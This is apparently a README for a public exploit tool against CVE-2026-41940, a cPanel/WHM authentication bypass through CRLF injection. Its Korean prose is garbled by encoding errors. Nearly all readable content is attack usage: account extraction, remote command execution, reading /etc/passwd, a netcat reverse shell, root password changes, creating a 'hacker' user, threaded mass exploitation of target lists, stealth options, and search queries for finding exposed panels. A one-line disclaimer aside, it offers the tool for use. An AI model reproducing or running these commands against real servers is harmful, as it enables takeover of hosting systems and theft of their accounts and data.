
๐ CVE-2026-41940 cPanel/WHM Auth Bypass Exploit - ์ต์ ์ ํ๋ก์ฐ ๐ฅ CRLF ์ธ์ ์ ์ผ๋ก ์ธ์ฆ ์ฐํ, ์ธ์ ํ์ด์ฌํน ๋ฐ ๊ณ์ ์ ์ถ์ ์ ๋ฐํฉ๋๋ค. โ ํ๋ก์, ์ปค์คํ UA, keep-alive, ์ฌ์๋, SSL ๊ฒ์ฆ, ์ปฌ๋ฌ ์ถ๋ ฅ, ํ์ผ ์ ์ฅ ์ง์. โก ์นจํฌ ํ ์คํฐ๋ฅผ ์ํ ๊ณ ๊ธ PoC.

cPanel & WHM ์๋์ - CRLF ์ฃผ์ ์ ํตํ ์ธ์ฆ ์ฐํ ๋ฐ ์์ ํ ์ธ์ ํ์ด์ฌํน
์ด ์ต์คํ๋ก์์ cPanel/WHM์ ์น๋ช ์ ์ธ ์ธ์ฆ ์ฐํ ์ทจ์ฝ์ ์ธ CVE-2026-41940์ ์ ์ฉํฉ๋๋ค. ์ธ์ ๊ด๋ฆฌ ์์คํ ์ ์ ๊ตํ๊ฒ ์ ์๋ CRLF ํ์ด๋ก๋๋ฅผ ์ฃผ์ ํ์ฌ ์ ํจํ ์๊ฒฉ ์ฆ๋ช ์์ด๋ ์ธ์ ํ์ด์ฌํน, ๋ฃจํธ ์ก์ธ์ค, ๊ทธ๋ฆฌ๊ณ ํธ์คํ ํจ๋์ ๋ํ ์์ ํ ์ ์ด๋ฅผ ๋ฌ์ฑํฉ๋๋ค.
| ์นดํ ๊ณ ๋ฆฌ | ๊ธฐ๋ฅ |
|---|---|
| ๊ณต๊ฒฉ | โ
CRLF ์ฃผ์
์ ํตํ ์ธ์ฆ ์ฐํ โ WHM ์ธ์ ํ์ด์ฌํน โ ๋ณด์ ํ ํฐ ์ ์ถ โ ์ฆ์ ๋ฃจํธ ์ก์ธ์ค |
| ์ฌํ ๊ณต๊ฒฉ | โ
๊ณ์ ๋ชฉ๋ก ์ถ์ถ (์ฌ์ฉ์ + ๋๋ฉ์ธ) โ ์๊ฒฉ ๋ช ๋ น ์คํ (RCE) โ ๋ฆฌ๋ฒ์ค ์ ธ (netcat ํธํ) โ ํ์ผ ์ฝ๊ธฐ (์ค์ ํ์ผ, ๋ก๊ทธ ๋ฑ) โ ๋ฃจํธ ๋น๋ฐ๋ฒํธ ๋ณ๊ฒฝ โ ์ cPanel ์ฌ์ฉ์ ์์ฑ |
| ์ค์บ๋ | โ
๋จ์ผ ๋์ ๊ณต๊ฒฉ โ ๋ค์ค ๋์ ๋๋ ์ค์บ โ ๋ฉํฐ์ค๋ ๋ฉ (์ค๋ ๋ ์ ์ค์ ๊ฐ๋ฅ) โ ํฌํธ ์ค๋ฒ๋ผ์ด๋ ์ง์ |
| ์๋ | โ
์์ฒญ ๊ฐ ๋๋ค ์ง์ฐ โ X-Forwarded-For ์คํธํ โ ์ปค์คํ User-Agent ์ง์ โ ํ๋ก์ ์ง์ (HTTP/HTTPS) |
| ์ฌ์ฉ์ฑ | โ
์ธํฐ๋ํฐ๋ธ WHM ์
ธ (-i)โ ์ปฌ๋ฌ ์ถ๋ ฅ (colorama) โ ์์ธ/๋๋ฒ๊ทธ ๋ชจ๋ โ ๊ณ์ ๋ชฉ๋ก ํ์ผ ๋ด๋ณด๋ด๊ธฐ โ Keep-Alive ์ธ์ ์ค๋ ๋ โ ๋ถ์์ ํ ์ฐ๊ฒฐ์ ์ํ ์ฌ์๋ ๋ฉ์ปค๋์ฆ |
| ์ ํ | ๋ฒ์ | ์ํ |
|---|---|---|
| cPanel & WHM | 11.92 - 11.102 | โ ํ์ธ๋จ |
| cPanel & WHM | 11.104 - 11.110 | โ ํ์ธ๋จ |
| cPanel & WHM | 11.118 - 11.136 | โ ๏ธ ์ ํ์ |
| cPanel & WHM | < 11.86 | โ ์ทจ์ฝํ ๊ฐ๋ฅ์ฑ ์์ |
port:2087 "cPanel" "WHM"
port:2083 "cPanel"
โ ๏ธ ๊ณ ์ง์ฌํญ: ์ด ๋๊ตฌ๋ ์น์ธ๋ ๋ณด์ ํ ์คํธ ๋ฐ ๊ต์ก ๋ชฉ์ ์ผ๋ก๋ง ์ฌ์ฉํด์ผ ํฉ๋๋ค. ๋ฌด๋จ ์ ๊ทผ์ ๋ถ๋ฒ์ ๋๋ค.
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41940-POC-Exploit
cd CVE-2026-41940-POC-Exploit
# Install dependencies
pip3 install -r requirements.txt
# Run
python3 exploit.py -t https://example.com:2087
# Basic exploitation (extract accounts)
python3 exploit.py -t https://192.168.1.100:2087
# Save accounts to file
python3 exploit.py -t https://192.168.1.100:2087 -o accounts.txt
# Verbose mode (debug output)
python3 exploit.py -t https://192.168.1.100:2087 -v
# Interactive WHM Shell (Recommended)
python3 exploit.py -t https://192.168.1.100:2087 -i
[email protected] $ accounts # List all cPanel accounts
[email protected] $ version # Show cPanel version
[email protected] $ ls /home # List directory
[email protected] $ cat /etc/passwd # Read file
[email protected] $ exec id # Execute command
[email protected] $ passwd NewPass123 # Change root password
[email protected] $ adduser test test.com pass123 # Create new user
[email protected] $ exit # Exit shell
## ๐ง ์๊ฒฉ ๋ช
๋ น ์คํ
```bash
# Execute single command
python3 exploit.py -t https://192.168.1.100:2087 --cmd "id"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "cat /etc/passwd"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "whoami; hostname; uname -a"
# Read file
python3 exploit.py -t https://192.168.1.100:2087 --read /etc/passwd
python3 exploit.py -t https://192.168.1.100:2087 --read /home/example/config.php
# Attacker machine (listener)
nc -lvnp 4444
# Exploit (reverse shell)
python3 exploit.py -t https://192.168.1.100:2087 --reverse-shell 10.0.0.1:4444
# Change root password
python3 exploit.py -t https://192.168.1.100:2087 --passwd "NewRootPass123!"
# Create new cPanel user
python3 exploit.py -t https://192.168.1.100:2087 --adduser hacker hacker.com Pass1234
# Keep-alive session (maintain access)
python3 exploit.py -t https://192.168.1.100:2087 --no-keep-alive # Disable auto keep-alive
# Create targets file
echo "https://target1.com:2087" > targets.txt
echo "https://target2.com:2087" >> targets.txt
echo "https://10.0.0.5:2087" >> targets.txt
# Mass exploit with 20 threads
python3 exploit.py -l targets.txt --threads 20
# Mass exploit with command execution
python3 exploit.py -l targets.txt --threads 10 --cmd "id"
# Custom port (non-standard)
python3 exploit.py -t https://example.com -p 8443
# Using proxy
python3 exploit.py -t https://192.168.1.100:2087 --proxy http://127.0.0.1:8080
# Custom user-agent for stealth
python3 exploit.py -t https://192.168.1.100:2087 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# Custom delay and retries
python3 exploit.py -t https://192.168.1.100:2087 --delay 5 --max-retries 5
# SSL verification (ignore self-signed by default)
python3 exploit.py -t https://192.168.1.100:2087 --ssl-verify
| ์งง์ ์ต์ | ๊ธด ์ต์ | ์ค๋ช | ๊ธฐ๋ณธ๊ฐ |
|---|---|---|---|
-t | --target | ๋จ์ผ ๋์ URL | ํ์ (๋จ์ผ) |
-l | --target-file | ๋์ ๋ชฉ๋ก์ด ํฌํจ๋ ํ์ผ | ํ์ (๋๋) |
-p | --port | ํฌํธ ์ค๋ฒ๋ผ์ด๋ | ์๋ ๊ฐ์ง |
-o | --output | ๊ณ์ ๋ชฉ๋ก์ ํ์ผ๋ก ์ ์ฅ | ์์ |
-v | --verbose | ๋๋ฒ๊ทธ ์ถ๋ ฅ ํ์ฑํ | False |
-i | --interactive | ์ธํฐ๋ํฐ๋ธ WHM ์ ธ | False |
--proxy | HTTP/HTTPS ํ๋ก์ | ์์ | |
-ua | --user-agent | ์ปค์คํ User-Agent | ๋๋ค |
--cmd | ๋จ์ผ ๋ช ๋ น ์คํ | ์์ | |
--reverse-shell | ๋ฆฌ๋ฒ์ค ์ ธ IP:PORT | ์์ | |
--passwd | ๋ฃจํธ ๋น๋ฐ๋ฒํธ ๋ณ๊ฒฝ | ์์ | |
--adduser | ์ ์ฌ์ฉ์ ์์ฑ (USER DOMAIN PASS) | ์์ | |
--read | ๋์์์ ํ์ผ ์ฝ๊ธฐ | ์์ | |
--threads | ๋๋ ์ค์บ์ฉ ์ค๋ ๋ ์ | 10 | |
--delay | Keep-Alive ๊ฐ๊ฒฉ (์ด) | 3.0 | |
--max-retries | ์์ฒญ๋น ์ต๋ ์ฌ์๋ ํ์ | 3 | |
--no-keep-alive | ์ธ์ ์ ์ง ์ ํจ | False | |
--ssl-verify | SSL ์ธ์ฆ์ ๊ฒ์ฆ | False |
docker run -d --name cpanel-test -p 2087:2087 cpanel/cpanel:102
docker pull cpanel/cpanel:11.102 docker run -d -p 2087:2087 cpanel/cpanel:11.102
์ ๋ค๋ฅธ ์ต์คํ๋ก์ ์ ์ฅ์๋ ํ์ธํด ๋ณด์ธ์: